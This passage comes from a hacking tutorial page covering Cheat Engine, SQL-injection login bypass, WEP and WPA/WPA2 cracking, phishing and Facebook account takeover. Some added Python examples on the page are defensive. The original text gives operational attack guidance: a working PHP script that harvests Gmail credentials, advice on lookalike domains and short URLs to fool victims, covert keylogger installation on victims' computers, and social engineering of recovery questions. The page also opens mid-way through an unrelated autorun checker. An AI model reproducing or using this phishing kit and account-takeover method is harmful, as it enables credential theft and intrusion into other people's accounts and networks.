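        # The ACTION text is what the user sees in the AutoPlay dialog; it is
        # chosen by whoever wrote the file, not derived from the program it runs.
        findings.append(("medium", f"AutoPlay label reads like a lure: {action!r}"))
    return findings


if __name__ == "__main__":
    for severity, message in assess_autorun(SAMPLE_AUTORUN):
        print(f"[{severity}] {message}")
```

The same check can be run over every autorun.inf found on a mounted drive; a clean label-and-icon file produces no findings.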

Hacking Games / Cheat Engine

Cheat Engine

Introduction: Here’s a seemingly typical tutorial on hacking games; games are hacked and cracked with a piece of software called Cheat Engine. Cheat Engine is an open source tool designed to help you modify (mostly) single-player games so the user can make them harder or easier depending on their preference. (Example: if you find that 100 HP is too easy in a particular game, you can try playing with a maximum of 10 HP as a challenge.) Cheat Engine (CE) also contains several other useful tools to help with debugging and really just messing around with games and pretty much any application. (Example: as a prank, one may alter the download speed shown in a torrent client/download manager to perhaps 100 Gbps or something like that.)

CE comes with a memory scanner to quickly scan for variables used within a game and allow you to change them, but it also comes with a debugger, disassembler, assembler, speedhack, trainer maker, Direct3D manipulation tools, system inspection tools, etc. – the ultimate tool for a mischievous programmer. So, read on to find out how CE does it.

Although CE can do quite a bit more, let’s take a look at an example of “hacking” a game. Now, every single application there is uses what are called “variables” to store various values. In a game, for example, the player’s HP, level, ammo, position – literally everything is stored in certain variables. There could be a separate variable with values 0-100 keeping track of hit points (HP), another variable keeping track of what level the user is currently in, and perhaps three more keeping track of the X, Y, Z coordinates of the avatar or player in a 3-D game. Almost all new games these days run in cycles. What I mean by that is the game has a recurring infinite loop of some function (group of statements) that goes on and on until the player exits/pauses the game. Inside the loop, the function’s code checks to see if (for example) any user event has occurred. Did the user press the arrow keys? If so, update their position accordingly. Did s/he click the left mouse button? If so, decrease ammo by one and call the function that launches a projectile from the gun, and so on. Certain aspects of games often rely completely on a particular variable and trust it to hold a legitimate value. Considering that the average user may never even know about the existence of these background variables, it’s a reasonably safe bet. It’s just a game after all, and implementing double checks, encrypted values and a sealed environment (sandbox) is simply not worth spoiling the performance and gameplay. This small point is what leaves almost every single-player game vulnerable to nosy software such as Cheat Engine.

This is also the reason why CE does not (yet) work for most big online games like RuneScape, WoW, AoC, etc., since the data and any changes made to it are always double-checked against the server’s copy. Whatever happens at the server stays at the server, and although you could make yourself LOOK like a pro, that will be only because of your dumb browser. (I.e., like all applications, your browser also maintains variables which can be tampered with, but that doesn’t affect the server’s copy.)

What CE does is try to find out which variables the application is using and the addresses at which they are stored in RAM, and possibly tamper with them according to what the user (you) may want. For gamers, this tool is simply a godsend. You can increase your speed in “Need for Speed”, get infinite ammo in “Call of Duty”, avoid killing a thousand people or typing cheat codes for money in “Grand Theft Auto”, and so much more.
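The scan-and-narrow loop described above can be shown on a toy scale. The following is an added example for this page (not Cheat Engine’s own code): a constructed “game” whose memory is a flat bytearray, a scanner that finds the HP variable by scanning for the on-screen value and rescanning after the value changes, and the server-side check that is the reason the same trick fails against online games.

```python
"""Simulate the scan / next-scan loop a memory scanner like Cheat Engine uses to
find where a game keeps a variable, followed by the server-side check that
defeats it. Added example for this page, not Cheat Engine's code; the 'game' is
a constructed stand-in: a flat bytearray of little-endian 32-bit integers."""
import random
import struct

WORD = 4  # scan granularity: 4-byte integers, the scanner's default value type

class FakeGame:
    """Single-player game memory: HP lives at an offset the scanner does not
    know, among other words, several of which also happen to hold 100."""

    def __init__(self, size_words=256, seed=1):
        rng = random.Random(seed)
        self.memory = bytearray(size_words * WORD)
        self.hp_offset = rng.randrange(size_words) * WORD
        for i in range(size_words):
            self.write(i * WORD, 100 if i % 16 == 0 else rng.randrange(1000))
        self.write(self.hp_offset, 100)

    def read(self, addr):
        return struct.unpack_from("<i", self.memory, addr)[0]

    def write(self, addr, value):
        struct.pack_into("<i", self.memory, addr, value)

    def displayed_hp(self):
        """What the HUD shows: the game loop reads HP straight from memory."""
        return self.read(self.hp_offset)

    def take_damage(self, amount):
        """One game-loop event that changes the variable."""
        self.write(self.hp_offset, self.read(self.hp_offset) - amount)

class Scanner:
    """First scan: every aligned address holding the on-screen value.
    Next scan: keep only candidates that now hold the new on-screen value."""

    def __init__(self, game):
        self.game = game
        self.candidates = []

    def first_scan(self, value):
        self.candidates = [a for a in range(0, len(self.game.memory), WORD)
                           if self.game.read(a) == value]
        return self.candidates

    def next_scan(self, value):
        self.candidates = [a for a in self.candidates if self.game.read(a) == value]
        return self.candidates

def locate_hp(game, damage_steps=(10, 25, 5)):
    """Scan, let the game change HP, rescan, until one address remains.
    Returns (address, number of narrowing rounds used)."""
    scanner = Scanner(game)
    scanner.first_scan(game.displayed_hp())
    rounds = 0
    for amount in damage_steps:
        if len(scanner.candidates) == 1:
            break
        game.take_damage(amount)  # an in-game event moves the real variable
        scanner.next_scan(game.displayed_hp())
        rounds += 1
    if len(scanner.candidates) != 1:
        raise RuntimeError("not isolated yet: change the value and scan again")
    return scanner.candidates[0], rounds

class AuthoritativeHp:
    """What online games do instead: the server owns the value and applies only
    events it saw itself, so an edited client-side copy changes nothing."""

    def __init__(self, hp=100):
        self._hp = hp

    def apply_damage(self, amount):
        self._hp -= amount

    def accept_client_report(self, reported):
        # The client's number is never trusted; a mismatch is a cheat signal.
        return reported == self._hp

if __name__ == "__main__":
    game = FakeGame()
    addr, rounds = locate_hp(game)
    print(f"HP found at offset {addr:#06x} after {rounds} narrowing scan(s)")
    game.write(addr, 9999)  # the 'cheat': overwrite the located variable
    print("HUD now shows", game.displayed_hp())
```

Because the other words in memory never change, at most two narrowing scans are needed; a real process has far more candidates and far more noise, which is why CE asks you to change the value and scan again.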

Unwinding back, how does any of this relate to hacking? It all lies in experience. CE teaches you how to find out exactly what the problem is and how to solve it. The procedure for tampering with games is very close to what we will try to accomplish in later, more advanced hacking techniques. CE gives you the feel and thrill of cracking a seemingly impossible problem and teaches you how to look for an open window when the door is locked – which is actually a very accurate definition of hacking. CE gives you a hint, a glimpse of advanced hacking procedures which we shall get to later on. Fair warning: in my experience I’ve noticed that the number one reason for beginners giving up early while learning hacking is simply that it gets a little boring. Outside of movies, that’s just the way it is. But for those willing to make the journey, the reward is more than worth it. I admit that to truly enjoy using CE, you have to be somewhat of a gamer. Hacking depends, more than anything else, on practice, because only practice can give you the experience needed to truly hack like what you see in movies. (Yes, it’s possible. Everything is.) CE is nowhere close to a professional hacking tool, but it’s a step in the right direction (plus it’s fun). For the programmers, as I mentioned before, CE is open source – it’s all out there waiting for you to explore. (Check out the official website given below.)

This was more of an introduction than a tutorial, and that’s because CE comes packed with its own excellent tutorial on its usage. For beginners I recommend going through the tutorial (the one that comes with CE). As easy as I’ve made it sound, head over to the following website to download CE and see for yourself.

http://www.cheatengine.org/

Hacking Website (Basic HTML Coding)

Web Hacking

Introduction: If you have basic HTML and JavaScript knowledge, you may be able to access password-protected websites. This article will give you an easy method to hack simple, less-secured websites of your choice simply through HTML. Use it responsibly. Unfortunately, websites with robust security will not be susceptible to this kind of simple attack.

Steps:

  • Open the site you want to hack.
  • Provide a wrong username/password combination in its login form. (e.g.: Username: me and Password: ' or 1=1 --)
  • An error will occur saying wrong username/password. Now be prepared: your experiment starts from here.
  • Right-click anywhere on that error page and go to View Source.
  • In the view-source window you can see the HTML code along with the JavaScript.
  • There you will find something like this: <form action="…Login…">
  • Before this login information, copy the URL of the site you are on. (e.g.: <form … action="http://www.targetwebsite.com/login…">)
  • Delete the JavaScript from the above that validates your information against the server. Do this very carefully. Your success in hacking the site depends upon how efficiently you delete the JavaScript code that validates your account information.
  • Take a close look for <input name="password" type="password"> and replace type="password" with type="text".
  • See there if the maximum length of the password is less than 11; if so, increase it to 11 (e.g.: if then write ).
  • Go to File => Save As and save it anywhere on your hard disk with the extension .html (e.g.: c:\chan.html).
  • Reopen your target web page by double-clicking the ‘chan.html’ file that you saved on your hard disk earlier.
  • You will see some changes in the current page compared to the original one. Don’t worry.
  • Provide any username [e.g.: hacker] and password [e.g.: ' or 1=1 --]. You have successfully cracked the above website and entered the account of the List user saved in the server’s database.

(We are Done and you will be able to enter the website)
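What the steps above actually exploit is not the HTML but the server’s query: deleting the JavaScript and raising maxlength only removes client-side checks that were never a control. The following is an added example for this page (not from the tutorial): a login written by string concatenation, which the ' or 1=1 -- password defeats, beside one that binds the input as a parameter and enforces its own length limits; the user table is constructed inline in an in-memory SQLite database.

```python
"""Why the client-side edits in the steps above do not matter and the server-side
query does: a login built by string concatenation beside one that uses a
parameterised query. Added example for this page, not from the tutorial; the
user table is constructed inline in an in-memory SQLite database."""
import sqlite3

INJECTION = "' or 1=1 --"  # the password value typed into the form above


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample accounts; plaintext passwords only to keep the demo short.
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The input is pasted into the SQL text: the quote closes the string,
    'or 1=1' makes the WHERE clause true for every row, and '--' comments
    out the rest. The first row of the table is returned, whoever that is."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Length limits enforced here rather than by the form's maxlength
    attribute (which a saved copy of the page can change), and placeholders
    so the input is bound as data and can never become part of the query."""
    if not (1 <= len(username) <= 64 and 1 <= len(password) <= 128):
        return None
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "hacker", INJECTION))  # alice
    print("hardened:  ", login_hardened(db, "hacker", INJECTION))    # None
```

The hardened version returns the same result whether the request came from the original page or from an edited copy on disk, which is the property the tutorial’s “robust security” sites have.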

Hacking WPA/WPA2

Wifi hacked

Introduction: WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys, so make sure airodump-ng shows the network as having the authentication type PSK; otherwise it is simply uncrackable (yet). But most networks do use PSK only, so your chances are good. Before continuing, just take a look at what type of protection the network has.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63-character password composed of random characters including special symbols. This is because in this hack our only option is a dictionary attack, which means literally testing each and every word in a text file and checking whether it is the password. A simple Google search for “dictionary attack list” will give you a text file containing all the known words; pick the one that’s the biggest.

There is another important difference between cracking WPA/WPA2 and WEP, which is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs (more packets), as when cracking WEP encryption, does not speed up the attack. The only thing that does give the information needed to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network and attempts to authenticate. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack if the password is set to anything unusual, since even an 8-character password is almost impossible to brute-force.

This means that the pass phrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

Also, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

There are pretty much no steps in this tutorial. All you need is the .cap file and a dictionary list:

  • Check out the WEP cracking tutorial and complete it up to step 10. Then you’ll have your .cap file, which contains the handshake information that aircrack uses to crack the key.
  • After you get the .cap file, open up Aircrack-ng; on the first screen find and select your .cap file, select the WPA encryption option, and find and select your dictionary list. If the password is in the dictionary list, you’ll see the magic happen and the key will appear.
  • You can simply try googling for a dictionary wordlist; there are tons out there. Try as many as you can, and if possible compile several into one and let aircrack do its thing overnight. Again, cracking WPA/WPA2 is much harder, so you need probability on your side to have a real chance at getting the password.

I’ve noticed that in many cases the WPA key is simply the mobile number of our naive victim. It’s usually 10 characters, easy to remember/type and, luckily for us, relatively easy to crack.
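To put numbers on the argument of this section (dictionary words and 10-digit phone numbers at one end, a random 63-character key at the other), here is an added example for this page, not part of the tutorial or of aircrack-ng. The wordlist and the guess rate are constructed assumptions; the PBKDF2 parameters are the ones WPA/WPA2 specifies for deriving the PMK from the passphrase and SSID, and they are what makes every candidate cost real work.

```python
"""How much work a dictionary or brute-force attack on a WPA/WPA2 pre-shared key
needs, for each kind of passphrase. Added example for this page, not from the
tutorial or aircrack-ng; the wordlist and the guess rate are constructed
assumptions, the PBKDF2 parameters are the ones WPA/WPA2 specifies."""
import hashlib
import math
import string
import time

PBKDF2_ROUNDS = 4096            # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
ASSUMED_GUESSES_PER_SEC = 1e5   # assumption for a fast cracking rig; adjust to taste
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Constructed stand-in for a downloaded wordlist.
WORDLIST = {"password", "letmein", "sunshine", "football", "iloveyou"}

CHAR_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
                string.digits, string.punctuation)


def wpa_pmk(passphrase, ssid):
    """The per-guess work: every candidate must go through this derivation
    before it can be checked against the captured handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)


def ms_per_guess(ssid="ConstructedSSID", samples=20):
    """Measure what one candidate costs on this machine, in milliseconds."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i}", ssid)
    return (time.perf_counter() - start) / samples * 1000


def keyspace_bits(passphrase, wordlist=WORDLIST):
    """How many bits an attacker must search, given how the passphrase was
    chosen. Returns (category, bits)."""
    if passphrase in wordlist:
        return "dictionary word", math.log2(len(wordlist))
    if passphrase.isdigit() and len(passphrase) == 10:
        return "phone number", 10 * math.log2(10)
    alphabet = sum(len(c) for c in CHAR_CLASSES if any(ch in c for ch in passphrase))
    alphabet = alphabet or 256  # characters outside the ASCII classes: treat as bytes
    return "random", len(passphrase) * math.log2(alphabet)


def years_to_exhaust(bits, rate=ASSUMED_GUESSES_PER_SEC):
    """Worst case for the attacker: try the whole keyspace at the given rate."""
    return 2 ** bits / rate / SECONDS_PER_YEAR


def passphrase_report(passphrase):
    """A summary a network owner can act on: category, bits, worst-case years."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    category, bits = keyspace_bits(passphrase)
    return {"category": category, "bits": round(bits, 1),
            "years_to_exhaust": years_to_exhaust(bits)}


if __name__ == "__main__":
    print(f"one PBKDF2 guess costs about {ms_per_guess():.2f} ms here")
    for candidate in ("sunshine", "9876543210", "aB3$" * 15 + "xyz"):  # constructed
        print(passphrase_report(candidate))
```

A 10-digit number is about 33 bits, which the assumed rig exhausts in hours, while a 63-character random key is over 400 bits; the difference is the keyspace, not the derivation, which is the same 4096 rounds for both.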

Hacking WEP

Wifi hacked

Introduction: This is a tutorial for hacking a WEP WiFi connection; if you want to hack WPA/WPA2 then click here.

Tools Required:

1. CommView for WiFi: http://tamos.com/download/main/ca.php
2. Aircrack-NG GUI: http://aircrack-ng.org/

  • Install CommView. During installation you may be asked whether you want to install the application in VoIP mode or Standard mode. Both modes will work fine for our case, but I usually used the VoIP mode. It automatically searches for and installs the drivers needed to enable packet capture on the wireless adapter (by turning on promiscuous mode). Just allow it to install the needed drivers and you are good to go to the next step. And please note that while using CommView, your WiFi networks will get disconnected. Don’t panic, you are doing it right!
  • After the installation, start the application and click on the left arrow on the left side.
  • You will be prompted with a new window. Click on the Start Scanning button.
  • In the right column, all the available networks around you will be shown. Just click the network you want to get the password of, and click on “Capture”. Please note that this tutorial is for WEP networks only!
  • Now the newly opened window will close and you can see that CommView has started capturing packets.
  • Click on Settings > Options > Memory Usage. Change the value of maximum packets in buffer to 20000.
  • Now click on the Logging tab. Select “Auto Logging”. Enter 2000 in “Maximum Directory Size” and 20 in “Average Log File Size”. We just told CommView to save the captured packets as *.ncf files of 20 MB each and store them in the directory we chose.
  • Again go to the “Logging” tab and select “Concatenate Logs” to join all the 20 MB split logs we just created. Now we have one *.ncf file.
  • Go to File > Log Viewer > Load CommView Logs and choose the *.ncf file that we just got from the concatenation step above.
  • Click File > Export > Wireshark/Tcpdump format. This will create a .cap file.
  • Go to the Aircrack application folder and then into the bin folder inside. Double-click Aircrack-ng GUI.exe and choose the *.cap file we just created in step 10.
  • And that’s it! If you have sufficient data to crack the password, you will get the password. It is advisable to proceed from step 8 to 11 only after receiving enough packets. You will need a minimum of 100000 packets to start the cracking. So after step 7, it is advisable to leave the system alone for 2-3 hours and then proceed to the further steps!

NOTE:
Recently CommView became paid software with a rather ridiculous price tag. But, no worries. There are more than enough alternatives. Some of them are mentioned below and can be used to obtain the .cap file as explained above:

•Cain & Abel:
http://www.oxid.it/cain.html

•WireShark:
http://www.wireshark.org/

For about a couple dozen more, check out the Wikipedia page (link below) listing almost every packet analyzer:
http://en.wikipedia.org/wiki/Comparison_of_packet_analyzers

They all work the same way; basically all we need is a means to get the .cap file, and after that the role of the packet analyzer is over. For most purposes Wireshark is more than enough, so kindly check out that one first. On a seemingly unrelated note, the war against piracy wages on and packet analyzers have become victims too. Proprietary software like CommView continues to be easily available on torrent websites, which shows just how harmful hacking can be to a company.

Phishing

Phishing

Introduction: This tutorial will explain how to create a fake login page for phishing; in this case we are going to use Gmail as an example. This procedure can be used to make fake pages for any other website in the same way. Yahoo!, Facebook, MySpace – any website you want can be made using this tutorial.

  • Head over to the website gmail.com.
  • Right-click anywhere and save the page as an HTML file.
  • Once you save the login page completely, you will see an HTML file and a folder with a name something like Email from google files. There will be two image files, namely “google_transparent.gif” and “mail_logo.png”.
  • Now we need to upload these images to any online image hosting website, for example tinypic.com, postimage.com or photobucket.com.
  • After uploading, go to the image where you uploaded it and copy the URL of each image.
  • Open the HTML file in any text editor like Notepad or MS Word. (You can use CTRL + F for the following.)
  • Search for “google_transparent.gif” (without quotes) and replace it with the corresponding URL. Search for “mail_logo.png” (without quotes) and replace it with the corresponding URL.
  • In the same file, search for: action=”https://www.google.com/accounts/ServiceLoginAuth”
  • And replace it with:

action=”http://yoursite.urlhere/login.php”

(You have to write your fake website’s URL there; see step 7 for creating it.)

  • Now save the file.
  • Now you need to create a PHP file called “login.php”. So open up a text editor (like Notepad) and type the following (you can copy it from this pastie):

<?php
$handle = fopen("password.txt", "a");
fwrite($handle, $_POST["Email"]);
fwrite($handle, "\n");
fwrite($handle, $_POST["Passwd"]);
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
header("Location: https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>

  • Now save it as login.php
  • Open up Notepad again and just save a new, empty file as “pswrds.txt”.

Now upload those three files (namely index.html, login.php and pswrds.txt) to any web hosting site that offers subdomains. (Note: that web hosting service must support PHP.)
You can use the following sites:

110mb.com
spam.com
justfree.com
007sites.com
(or simply google it)

Follow the instructions on the web hosting site and set up your fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious. (Just make sure the URL doesn’t stand out in the address bar, as it may alert the victim.)

  • Create a fake email account, if you prefer to send the phishing webpage link anonymously.
  • And now all you have to do is send the victim something like: ‘Gmail starts new feature: to use this service, log in to this page’, along with the link to your fake website.

Note: To make the user believe it, change your phishing web page URL using any of the free short URL sites like co.nr, co.cc, cz.cc.
This will make users believe that it is the correct URL.
Nevertheless, if you do get caught, act like you had no clue:

‘OMG ! I logged in to that website too , I’m going to change my pass now ! you do the same, quickly !’.

Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine, whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide, by simply peeking at the address bar in your web browser. Also, avoid following any links from dodgy websites, scam emails or even the comment sections in various places.
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.
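The address-bar check above can be written down as a rule set. The following is an added example for this page (not from the tutorial): it classifies where a link actually leads relative to the site it claims to be, catching the three tricks this section relies on: a digit-for-letter name like g00gle.com, a short-URL redirector, and the real domain buried inside a longer hostname. The homoglyph table is a constructed assumption; the shorteners are the ones named above.

```python
"""Automate the 'peek at the address bar' advice above: classify where a link
actually leads relative to the site it claims to be. Added example for this
page, not from the tutorial; the homoglyph table and shortener list are
constructed assumptions (the shorteners are the ones the tutorial names)."""
from urllib.parse import urlsplit

SHORTENERS = {"co.nr", "co.cc", "cz.cc"}
# Digit-for-letter swaps of the kind used in names like g00gle.com.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "|": "l"})


def registered_domain(host):
    """Last two labels of the host; adequate for the .com-style names used here."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def assess_link(url, expected_domain="google.com"):
    """Return one of: genuine, genuine-but-http, redirector,
    lookalike-embedded, lookalike-homoglyph, unrelated."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    reg = registered_domain(host)
    if reg == expected_domain:
        return "genuine" if parts.scheme == "https" else "genuine-but-http"
    if reg in SHORTENERS:
        # A short-URL service hides the real destination until you click.
        return "redirector"
    if expected_domain in host:
        # accounts.google.com.evil.net: the real name is just a subdomain label.
        return "lookalike-embedded"
    if reg.translate(HOMOGLYPHS) == expected_domain:
        return "lookalike-homoglyph"
    return "unrelated"


if __name__ == "__main__":
    # Constructed sample links, including the name the tutorial suggests.
    for link in ("https://accounts.google.com/ServiceLoginAuth",
                 "http://g00gle.com/login.php",
                 "http://accounts.google.com.evil.net/",
                 "http://gmail.co.nr/"):
        print(f"{assess_link(link):20s} {link}")
```

Only the first of those four is the site it claims to be; everything else is what the address bar would have shown a victim who looked.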

Note: This method currently does not work. At the time of writing, the files we uploaded to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the login page almost every other week, causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names, you may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.

Hacking Facebook

Facebook Hacking

Note: Contrary to popular belief, there doesn’t exist some secret software where one can just put in an email id, press “Enter” and have all the passwords associated with that account magically appear. Hacking Facebook, like any other hack, takes time, skill and effort. Also, the methods are much the same for hacking any type of account, for that matter.

Methods: There are 3 main methods used when it comes to hacking Facebook accounts. Briefly, they are:

  • Keyloggers: making the victim open up their account on a system with a keylogger attached, or sending a remote keylogger to the victim.
  • Phishing: making a fake login page and having the entered details sent to you. (This has been explained in the beginner section.)
  • Social Engineering: this is just a fancy term for making the victim give up vital information in a supposedly casual conversation. The information may be the answer to the user’s recovery question, which can then be used to take over the account via the “Forgot your password? Click Here!” button.

Warning: Some time ago, Facebook developers patched in a new security feature. In a nutshell, if Facebook detects that your IP address is different from the usual (previously used) IP addresses, it may stop you from logging in without further identity verification, which may be, for example, an SMS code. Now this can potentially affect every type of hack, but whether it is in fact possible, there is only one way to know:
By doing it. Hope for the best, prepare for the worst.

  • Keyloggers:
    A keylogger is a type of software that usually runs in the background, without the knowledge of an innocent victim, and secretly records their actions. A wide variety of functionality is offered by various products: almost all record every keystroke on the keyboard in a simple text file, some record mouse clicks and pointer locations, some record folders and files opened, and some even take screenshots at regular intervals.
    Most keyloggers provide an option to store the text file locally, send it to an FTP server, or send it to your email id. They can be installed and set up relatively easily, like any other program. Once set up, they usually go into hiding as a background process, leaving no trace on the surface and starting up automatically when the operating system starts.

For some reason people seem to avoid or overlook keyloggers. I can give you my word this is the best and easiest method for hacking any type of account there is, so definitely check this out. In our case, we want the victim to log in to their Facebook account on a compromised system, one that has a stealthy keylogger installed. There are two ways to go about this: installing a keylogger on your system and having them use it to log in to their FB account, or, if you have temporary access to their system, installing it on their computer and having the log files sent to you by email or FTP.
Whichever way you prefer, the method is the same. Download a keylogger, follow the setup instructions as you would when installing anything, and customize the settings according to your preference; or download the keylogger, copy it onto a pen drive and then install it on the victim’s PC.
I have personally tried and tested the following keyloggers; you can choose any of these since they all seem to do the job:

(i)Actual key-logger – Download from http://www.actualkeylogger.com/download-free-key-logger.html
(ii)Home key-logger – Download from http://www.kmint21.com/download.html
(iii) REFOG Free key-logger – Download from https://www.refog.com/download.html

(Certain full versions of very good keyloggers are available as torrents from websites like isohunt.com , kickass.to )

  • Phishing : This method has been described in great detail in the Phishing section. Follow the instructions carefully while using facebook.com instead of gmail.com.
  • Social Engineering :
    Facebook uses security questions as a recovery method, and almost everyone sets it up with a personal question like:
    “Where were you born?”
    “What was your first pet’s name?”

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
A social engineer runs what used to be called a “con game.” For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network’s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access.
Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.

For this method to work, you need to know the person whose account you want to hack. In fact, you need to know them well enough that it doesn’t seem suspicious when you carefully work their recovery questions into your conversation and get them to answer casually.
After that, using the “Forgot your password? Click Here!” button, one can simply take over the user’s account. But even after this, your work is not done yet. Nowadays Facebook has implemented a 24-hour delay before recovering the account and logging in, so if the victim happens to log in during that period they can reverse the process in seconds. Not only do you need careful planning, but also careful timing.
Facebook uses a verification method during recovery: if the victim’s email and phone number are no longer functional, it asks you to enter another phone number. If you can somehow get hold of their cell phone or email account, their account is yours; otherwise the process may be slow and fruitless.